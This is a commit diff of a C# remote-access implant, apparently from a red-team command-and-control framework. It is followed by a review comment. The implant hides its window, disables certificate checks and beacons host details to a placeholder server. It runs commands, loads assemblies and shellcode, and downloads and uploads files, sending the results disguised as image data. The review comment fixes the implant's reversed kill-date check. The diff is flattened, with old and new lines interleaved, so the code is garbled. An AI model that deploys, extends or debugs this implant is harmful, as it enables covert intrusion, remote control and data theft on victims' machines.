Update sharp.cs

[+] use of ManualResetEvents instead of Thread.Sleep
[+] Add Jitter to beacontime
[+] General tidy up
chunking
rolen 2019-01-03 18:33:10 +00:00
parent 782429387f
commit 205d4f3693
1 changed files with 432 additions and 493 deletions


@ -16,519 +16,458 @@ using System.Collections.Generic;
public class Program public class Program
{ {
[DllImport("kernel32.dll")] [DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow(); static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")] [DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public const int SW_HIDE = 0; public const int SW_HIDE = 0;
public const int SW_SHOW = 5; public const int SW_SHOW = 5;
public static string scode = ""; public static string scode = "";
public static string proc = @"c:\windows\system32\netsh.exe"; public static string proc = @"c:\windows\system32\netsh.exe";
public static void Sharp() public static void Sharp()
{ {
var handle = GetConsoleWindow(); var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE); ShowWindow(handle, SW_HIDE);
AllowUntrustedCertificates(); AllowUntrustedCertificates();
try { primer(); } catch { } try { primer(); } catch { }
Thread.Sleep(300000); var mre = new System.Threading.ManualResetEvent(false);
try { primer(); } catch { } mre.WaitOne(300000);
Thread.Sleep(600000); try { primer(); } catch { }
try { primer(); } catch { } mre.WaitOne(600000);
} try { primer(); } catch { }
}
public static void Main() public static void Main()
{ {
Sharp(); Sharp();
} }
static byte[] Combine(byte[] first, byte[] second) static byte[] Combine(byte[] first, byte[] second)
{ {
byte[] ret = new byte[first.Length + second.Length]; byte[] ret = new byte[first.Length + second.Length];
Buffer.BlockCopy(first, 0, ret, 0, first.Length); Buffer.BlockCopy(first, 0, ret, 0, first.Length);
Buffer.BlockCopy(second, 0, ret, first.Length, second.Length); Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
return ret; return ret;
} }
static System.Net.WebClient GetWebRequest(string cookie) static System.Net.WebClient GetWebRequest(string cookie)
{ {
var x = new System.Net.WebClient(); var x = new System.Net.WebClient();
string purl = "#REPLACEPROXYURL#"; var purl = "#REPLACEPROXYURL#";
string puser = "#REPLACEPROXYUSER#"; var puser = "#REPLACEPROXYUSER#";
string ppass = "#REPLACEPROXYPASSWORD#"; var ppass = "#REPLACEPROXYPASSWORD#";
if (!String.IsNullOrEmpty(purl)) { if (!String.IsNullOrEmpty(purl))
WebProxy proxy = new WebProxy(); {
proxy.Address = new Uri(purl); WebProxy proxy = new WebProxy();
proxy.Credentials = new NetworkCredential(puser, ppass); proxy.Address = new Uri(purl);
proxy.UseDefaultCredentials = false; proxy.Credentials = new NetworkCredential(puser, ppass);
proxy.BypassProxyOnLocal = false; proxy.UseDefaultCredentials = false;
x.Proxy = proxy; proxy.BypassProxyOnLocal = false;
} x.Proxy = proxy;
}
string df = "#REPLACEDF#"; var df = "#REPLACEDF#";
if (!String.IsNullOrEmpty(df)) { if (!String.IsNullOrEmpty(df))
x.Headers.Add("Host",df); x.Headers.Add("Host", df);
}
x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#"); x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
x.Headers.Add("Referer", "#REPLACEREFERER#"); x.Headers.Add("Referer", "#REPLACEREFERER#");
if (cookie != null) if (null != cookie)
{ x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
}
return x; return x;
} }
static string Decryption(string key, string enc) static string Decryption(string key, string enc)
{ {
var b = System.Convert.FromBase64String(enc); var b = System.Convert.FromBase64String(enc);
Byte[] IV = new Byte[16]; var IV = new Byte[16];
Array.Copy(b, IV, 16); Array.Copy(b, IV, 16);
try { try
var a = CAMR(key, System.Convert.ToBase64String(IV)); {
var d = a.CreateDecryptor(); var a = CreateCam(key, System.Convert.ToBase64String(IV));
var u = d.TransformFinalBlock(b, 16, b.Length - 16); var u = a.CreateDecryptor().TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u); return System.Text.Encoding.UTF8.GetString(u);
} catch { }
var a = CAMA(key, System.Convert.ToBase64String(IV)); catch
var d = a.CreateDecryptor(); {
var u = d.TransformFinalBlock(b, 16, b.Length - 16); var a = CreateCam(key, System.Convert.ToBase64String(IV), false);
return System.Text.Encoding.UTF8.GetString(u); var u = a.CreateDecryptor().TransformFinalBlock(b, 16, b.Length - 16);
} return System.Text.Encoding.UTF8.GetString(u);
}
finally
{
Array.Clear(b, 0, b.Length);
Array.Clear(IV, 0, 16);
}
}
} static string Encryption(string key, string un, bool comp = false, byte[] unByte = null)
{
byte[] byEnc = null;
if (unByte != null)
byEnc = unByte;
else
byEnc = System.Text.Encoding.UTF8.GetBytes(un);
static string Encryption(string key, string un, bool comp = false, byte[] unByte = null) if (comp)
{ byEnc = Compress(byEnc);
byte[] b = null;
if (unByte != null) {
b = unByte;
} else {
b = System.Text.Encoding.UTF8.GetBytes(un);
}
byte[] byEnc = b;
if (comp){
byEnc = Compress(b);
}
try {
var a = CAMR(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
} catch {
var a = CAMA(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
}
}
static System.Security.Cryptography.AesCryptoServiceProvider CAMA(string key,string IV) try
{ {
System.Security.Cryptography.AesCryptoServiceProvider b = new System.Security.Cryptography.AesCryptoServiceProvider(); var a = CreateCam(key, null);
b.Mode = System.Security.Cryptography.CipherMode.CBC; var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
b.Padding = System.Security.Cryptography.PaddingMode.Zeros; return System.Convert.ToBase64String(Combine(a.IV, f));
b.BlockSize = 128; }
b.KeySize = 256; catch
{
var a = CreateCam(key, null, false);
var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
return System.Convert.ToBase64String(Combine(a.IV, f));
}
}
if (IV != null) static System.Security.Cryptography.SymmetricAlgorithm CreateCam(string key, string IV, bool rij = true)
{ {
b.IV = System.Convert.FromBase64String(IV); System.Security.Cryptography.SymmetricAlgorithm a = null;
} if (rij)
a = new System.Security.Cryptography.RijndaelManaged();
else
a = new System.Security.Cryptography.AesCryptoServiceProvider();
if (key != null) a.Mode = System.Security.Cryptography.CipherMode.CBC;
{ a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
b.Key = System.Convert.FromBase64String(key); a.BlockSize = 128;
} a.KeySize = 256;
return b; if (null != IV)
} a.IV = System.Convert.FromBase64String(IV);
else
a.GenerateIV();
static System.Security.Cryptography.RijndaelManaged CAMR(string key,string IV) if (null != key)
{ a.Key = System.Convert.FromBase64String(key);
System.Security.Cryptography.RijndaelManaged a = new System.Security.Cryptography.RijndaelManaged();
a.Mode = System.Security.Cryptography.CipherMode.CBC;
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
a.BlockSize = 128;
a.KeySize = 256;
if (IV != null) return a;
{ }
a.IV = System.Convert.FromBase64String(IV); static void AllowUntrustedCertificates()
} {
try
{
System.Net.ServicePointManager.ServerCertificateValidationCallback = (z, y, x, w) => { return true; };
}
catch { }
}
if (key != null) static void primer()
{ {
a.Key = System.Convert.FromBase64String(key); if (Convert.ToDateTime("#REPLACEKILLDATE#") > DateTime.Now)
} {
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
var o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
return a; var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
} var x = Decryption(key, primer);
static void AllowUntrustedCertificates() var re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
{ var m = re.Match(x);
try string RandomURI = m.Groups[1].ToString();
{
System.Net.ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(delegate { return true; } );
}
catch { }
}
static void primer() re = new Regex("URLS10484390243(.*)34209348401SLRU");
{ m = re.Match(x);
DateTime now = DateTime.Now; string URLS = m.Groups[1].ToString();
DateTime killDate = Convert.ToDateTime("#REPLACEKILLDATE#");
if (killDate < now){
//Console.ReadLine();
} else {
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
string o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
string key = "#REPLACEKEY#";
var pp = Encryption(key, o);
string baseURL = "#REPLACEBASEURL#";
string s = "#REPLACESTARTURL#";
var primer = GetWebRequest(pp).DownloadString(s);
var x = Decryption(key, primer);
Regex re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR"); re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
Match m = re.Match(x); m = re.Match(x);
string RandomURI = m.Groups[1].ToString(); var KillDate = m.Groups[1].ToString();
re = new Regex("URLS10484390243(.*)34209348401SLRU"); re = new Regex("SLEEP98001(.*)10089PEELS");
m = re.Match(x); m = re.Match(x);
string URLS = m.Groups[1].ToString(); var Sleep = m.Groups[1].ToString();
re = new Regex("KILLDATE1665(.*)5661ETADLLIK"); re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
m = re.Match(x); m = re.Match(x);
var KillDate = m.Groups[1].ToString(); var NewKey = m.Groups[1].ToString();
re = new Regex("SLEEP98001(.*)10089PEELS"); re = new Regex("IMGS19459394(.*)49395491SGMI");
m = re.Match(x); m = re.Match(x);
var Sleep = m.Groups[1].ToString(); var IMGs = m.Groups[1].ToString();
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN"); ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
m = re.Match(x); }
var NewKey = m.Groups[1].ToString(); }
re = new Regex("IMGS19459394(.*)49395491SGMI"); static byte[] Compress(byte[] raw)
m = re.Match(x); {
var IMGs = m.Groups[1].ToString(); using (var memory = new MemoryStream())
using (var gzip = new GZipStream(memory, CompressionMode.Compress, true))
{
gzip.Write(raw, 0, raw.Length);
return memory.ToArray();
}
}
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs); static Type LoadSomething(string assemblyQualifiedName)
} {
return Type.GetType(assemblyQualifiedName, (name) =>
{
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
}, null, true);
}
internal static class UrlGen
{
static List<String> _stringnewURLS = new List<String>();
static String _randomURI;
static String _baseUrl;
static Random _rnd = new Random();
static Regex _re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+", RegexOptions.Compiled);
internal static void Init(string stringURLS, String RandomURI, String baseUrl)
{
_stringnewURLS = _re.Matches(stringURLS.Replace(",", "").Replace(" ", "")).Cast<Match>().Select(m => m.Value).Where(m => !string.IsNullOrEmpty(m)).ToList();
_randomURI = RandomURI;
_baseUrl = baseUrl;
} }
static byte[] Compress(byte[] raw) internal static String GenerateUrl()
{ {
using (MemoryStream memory = new MemoryStream()) string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
{ return $"{_baseUrl}/{URL}{Guid.NewGuid()}/?{_randomURI}";
using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true)) }
{ }
gzip.Write(raw, 0, raw.Length);
}
return memory.ToArray();
}
}
static byte[] GetImgData(byte[] cmdoutput, string[] stringnewIMGS) internal static class ImgGen
{ {
Random rnd = new Random(); static Random _rnd = new Random();
string randimg = stringnewIMGS[rnd.Next(stringnewIMGS.Length)]; static Regex _re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+", RegexOptions.Compiled);
byte[] imgBytes = System.Convert.FromBase64String(randimg); static List<String> _newImgs = new List<String>();
var maxByteslen = 1500;
var maxDatalen = 1500 + cmdoutput.Length;
var imageByteslen = imgBytes.Length;
var paddingByteslen = maxByteslen - imageByteslen;
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(paddingByteslen)));
var ImageBytesFull = new byte[maxDatalen]; internal static void Init(String stringIMGS)
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length); {
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length); var stringnewIMGS = _re.Matches(stringIMGS.Replace(",", "")).Cast<Match>().Select(m => m.Value);
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length); stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m));
return ImageBytesFull; }
}
static Random random = new Random(); static string RandomString(int length)
{
const string chars = "...................@..........................Tyscf";
return new string(Enumerable.Repeat(chars, length).Select(s => s[_rnd.Next(s.Length)]).ToArray());
}
static string RandomString(int length) internal static byte[] GetImgData(byte[] cmdoutput)
{ {
const string chars = "...................@..........................Tyscf"; Int32 maxByteslen = 1500, maxDatalen = cmdoutput.Length + maxByteslen;
return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray()); var randimg = _newImgs[(new Random()).Next(0, _newImgs.Count)];
} var imgBytes = System.Convert.FromBase64String(randimg);
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(maxByteslen - imgBytes.Length)));
var ImageBytesFull = new byte[maxDatalen];
static Type LoadSomething(string assemblyQualifiedName) System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
{ System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
// Throws exception is type was not found System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
return Type.GetType( return ImageBytesFull;
assemblyQualifiedName, }
(name) => }
{
// Returns the assembly of the type by enumerating loaded assemblies
// in the app domain
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
},
null,
true);
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS) static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
{ {
var re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+"); UrlGen.Init(stringURLS, RandomURI, baseURL);
ImgGen.Init(stringIMGS);
string strURLS = stringURLS.Replace(",",""); if (!Int32.TryParse(Sleep, out int beacontime))
strURLS = strURLS.Replace(" ",""); beacontime = 5;
var stringnewURLS = re.Matches(strURLS).Cast<Match>().Select(m => m.Value).ToArray();
stringnewURLS = stringnewURLS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
string strIMGS = stringIMGS.Replace(",",""); var strOutput = new StringWriter();
var stringnewIMGS = re.Matches(strIMGS).Cast<Match>().Select(m => m.Value).ToArray(); Console.SetOut(strOutput);
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m)).ToArray(); var exitvt = new ManualResetEvent(false);
var output = new StringBuilder();
while (!exitvt.WaitOne((int)(beacontime * 1000 * (((new Random()).Next(0, 2) > 0) ? 1.05 : 0.95))))
{
if (Convert.ToDateTime(KillDate) > DateTime.Now)
{
exitvt.Set();
continue;
}
output.Length = 0;
try
{
String x = "", tasksrc = "", cmd = null;
try
{
cmd = GetWebRequest(null).DownloadString(UrlGen.GenerateUrl());
x = Decryption(Key, cmd).Replace("\0", string.Empty);
}
catch
{
continue;
} //CAN YOU CONTINUE FROM THIS POINT?
int beacontime = 5; if (x.ToLower().StartsWith("multicmd"))
{
var splitcmd = x.Replace("multicmd", "");
var split = splitcmd.Split(new string[] { "!d-3dion@LD!-d" }, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
tasksrc = c;
if (c.ToLower().StartsWith("exit"))
{
exitvt.Set();
break;
}
else if (c.ToLower().StartsWith("loadmodule"))
{
var module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
output.AppendLine("Module loaded sucessfully");
tasksrc = "Module loaded sucessfully";
}
else if (c.ToLower().StartsWith("upload-file"))
{
var path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase);
var splitargs = path.Split(new string[] { ";" }, StringSplitOptions.RemoveEmptyEntries);
Console.WriteLine("Uploaded file to: " + splitargs[1]);
var fileBytes = Convert.FromBase64String(splitargs[0]);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
tasksrc = "Uploaded file sucessfully";
}
else if (c.ToLower().StartsWith("download-file"))
{
var path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase);
var file = File.ReadAllBytes(path.Replace("\"", ""));
var fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
if (!Int32.TryParse(Sleep, out beacontime)) var dtask = Encryption(Key, c);
{ var dcoutput = Encryption(Key, "", true, fileChuck);
beacontime = 5; var doutputBytes = System.Convert.FromBase64String(dcoutput);
} var dsendBytes = ImgGen.GetImgData(doutputBytes);
var strOutput = new StringWriter(); GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes);
Console.SetOut(strOutput); }
bool bExit = true; else if (c.ToLower().StartsWith("listmodules"))
while(bExit) {
{ var appd = AppDomain.CurrentDomain.GetAssemblies();
Random rnd = new Random(); output.AppendLine("[+] Modules loaded:").AppendLine("");
string URL = stringnewURLS[rnd.Next(stringnewURLS.Length)]; foreach (var ass in appd)
string G = (Guid.NewGuid()).ToString(); output.AppendLine(ass.FullName.ToString());
URL = baseURL+"/"+URL+G+"/?"+RandomURI; }
Thread.Sleep(beacontime*1000); else if (c.ToLower().StartsWith("$shellcode"))
scode = c.Substring(13, c.Length - 13).Replace("\"", "");
DateTime now = DateTime.Now; else if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe"))
DateTime killDate = Convert.ToDateTime(KillDate); {
if (killDate < now){ var splitargs = c.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
bExit = false; int i = 0;
} string method = "", splittheseargs = "", qualifiedname = "", name = "";
string output = ""; foreach (var a in splitargs)
try { {
string cmd = null; if (i == 1)
string x = ""; qualifiedname = a;
string tasksrc = ""; if (i == 2)
try { name = a;
cmd = GetWebRequest(null).DownloadString(URL);
x = Decryption(Key, cmd);
x = x.Replace("\0", string.Empty);
} catch {}
if (x.ToLower().StartsWith("multicmd"))
{
string splitcmd = x.Replace("multicmd","");
string[] split = splitcmd.Split(new string[] {"!d-3dion@LD!-d"}, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
tasksrc = c;
output = "";
//add upload-file
if (c.ToLower().StartsWith("loadmodule")){ if (c.ToLower().StartsWith("run-exe"))
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase); if (i > 2)
Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module)); splittheseargs = splittheseargs + " " + a;
output += "Module loaded sucessfully"; else
tasksrc = "Module loaded sucessfully"; if (i == 3)
} method = a;
else if (i > 3)
splittheseargs = splittheseargs + " " + a;
i++;
}
var splitnewargs = splittheseargs.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies())
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try
{
if (c.ToLower().StartsWith("run-exe"))
output.AppendLine(loadedType.Assembly.EntryPoint.Invoke(null, new object[] { splitnewargs }).ToString());
else
{
try
{
output.AppendLine(loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { splitnewargs }).ToString());
}
catch
{
output.AppendLine(loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, null).ToString());
}
}
}
catch { }
}
}
}
else if (c.ToLower().StartsWith("start-process"))
{
var proc = c.Replace("'", "").Replace("\"", "");
var pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
var args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
var p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = p.StartInfo.RedirectStandardError = p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output.AppendLine(p.StandardOutput.ReadToEnd()).AppendLine(p.StandardError.ReadToEnd());
p.WaitForExit();
}
else if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon"))
{
var bcnRgx = new Regex(@"(?<=(setbeacon|beacon)\s{1,})(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase);
var mch = bcnRgx.Match(c);
if (mch.Success)
{
beacontime = Int32.Parse(mch.Groups["t"].Value);
switch (mch.Groups["u"].Value)
{
case "h":
beacontime *= 3600;
break;
case "m":
beacontime *= 60;
break;
}
}
else
output.AppendLine($@"[X] Invalid time ""{c}""");
}
if (c.ToLower().StartsWith("upload-file")){ output.AppendLine(strOutput.ToString());
string path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase); var sb = strOutput.GetStringBuilder();
string[] splitargs = path.Split(new string[] {";"}, StringSplitOptions.RemoveEmptyEntries); sb.Remove(0, sb.Length);
Console.WriteLine("Uploaded file to: " + splitargs[1]); if (tasksrc.Length > 200)
byte[] fileBytes = Convert.FromBase64String(splitargs[0]); tasksrc = tasksrc.Substring(0, 199);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes); var task = Encryption(Key, tasksrc);
tasksrc = "Uploaded file sucessfully"; var coutput = Encryption(Key, output.ToString(), true);
} var outputBytes = System.Convert.FromBase64String(coutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
if (c.ToLower().StartsWith("download-file")){ GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
string path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase); }
byte[] file = File.ReadAllBytes(path.Replace("\"", "")); }
byte[] fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file); }
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)]; catch (Exception e)
G = (Guid.NewGuid()).ToString(); {
URL = baseURL+"/"+URL+G+"/?"+RandomURI; var task = Encryption(Key, "Error");
string dtask = Encryption(Key, c); var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true);
string dcoutput = Encryption(Key, "", true, fileChuck); var outputBytes = System.Convert.FromBase64String(eroutput);
byte[] doutputBytes = System.Convert.FromBase64String(dcoutput); var sendBytes = ImgGen.GetImgData(outputBytes);
byte[] dsendBytes = GetImgData(doutputBytes, stringnewIMGS); GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
GetWebRequest(dtask).UploadData(URL, dsendBytes); }
} }
}
if (c.ToLower().StartsWith("listmodules")){
var appd = AppDomain.CurrentDomain.GetAssemblies();
output += "[+] Modules loaded: \n\n";
foreach (var ass in appd)
{
output += ass.FullName.ToString() + "\n";
}
}
if (c.ToLower().StartsWith("$shellcode")){
string sc = c.Substring(13,c.Length - 13);
sc = sc.Replace("\"", "");
scode = sc;
}
if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe")){
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries);
int i = 0;
string method = "";
string splittheseargs = "";
string qualifiedname = "";
string name = "";
foreach (string a in splitargs) {
if (i == 1){
qualifiedname = a;
}
if (i == 2){
name = a;
}
if (c.ToLower().StartsWith("run-exe")) {
if (i > 2){
splittheseargs = splittheseargs + " " + a;
}
} else {
if (i == 3){
method = a;
}
if (i > 3){
splittheseargs = splittheseargs + " " + a;
}
}
i ++;
}
string[] splitnewargs = splittheseargs.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
var myList = new List<string>();
foreach (var arg in splitnewargs) {
myList.Add(arg);
}
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
foreach (var Ass in AppDomainAss)
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try {
if (c.ToLower().StartsWith("run-exe")) {
var xxx = loadedType.Assembly.EntryPoint.Invoke(null, new object[] { myList.ToArray() });
output = xxx.ToString();
} else {
try {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { myList.ToArray() });
output = xxx.ToString();
} catch {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, null);
output = xxx.ToString();
}
}
} catch { }
}
}
}
if (c.ToLower().StartsWith("exit")){
bExit = false;
}
if (c.ToLower().StartsWith("start-process")){
string proc = c.Replace("'", "");
proc = proc.Replace("\"", "");
string pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
string args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output = p.StandardOutput.ReadToEnd();
output = output + p.StandardError.ReadToEnd();
p.WaitForExit();
}
if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) {
string beacon = Regex.Replace(c, "setbeacon ", "", RegexOptions.IgnoreCase);
beacon = Regex.Replace(beacon, "beacon ", "", RegexOptions.IgnoreCase);
if (beacon.ToLower().Contains("s"))
{
beacon = Regex.Replace(beacon, "s", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
else if (beacon.ToLower().Contains("m"))
{
beacon = Regex.Replace(beacon, "m", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
}
else if (beacon.ToLower().Contains("h"))
{
beacon = Regex.Replace(beacon, "h", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
beacontime = beacontime * 60;
}
else if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
output += strOutput.ToString();
StringBuilder sb = strOutput.GetStringBuilder();
sb.Remove(0, sb.Length);
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
if (tasksrc.Length > 200) {
tasksrc = tasksrc.Substring(0,199);
}
string task = Encryption(Key, tasksrc);
string coutput = Encryption(Key, output, true);
byte[] outputBytes = System.Convert.FromBase64String(coutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
GetWebRequest(task).UploadData(URL, sendBytes);
}
}
} catch (Exception e) {
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
URL = baseURL+"/"+URL+RandomURI;
string task = Encryption(Key, "Error");
string eroutput = Encryption(Key, "Error: " + output + e, true);
byte[] outputBytes = System.Convert.FromBase64String(eroutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
GetWebRequest(task).UploadData(URL, sendBytes);
}
}
}
} }
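Review bot: The kill-date guard at the top of the new `while` loop in `ImplantCore` appears to be reversed: it calls `exitvt.Set()` when `Convert.ToDateTime(KillDate) > DateTime.Now`, that is while the date is still in the future, whereas the removed code stopped the loop on `killDate < now`. As written, the loop would end on its first pass during the permitted window and keep running once the date has passed, so the control that bounds the agent's lifetime no longer holds. `primer()` uses the same `>` expression to mean "still allowed to run", which suggests the line was copied without flipping it; the guard should read `if (Convert.ToDateTime(KillDate) < DateTime.Now)`. The old and new sides are inferred from the merged two-column rendering, so confirm against the raw file.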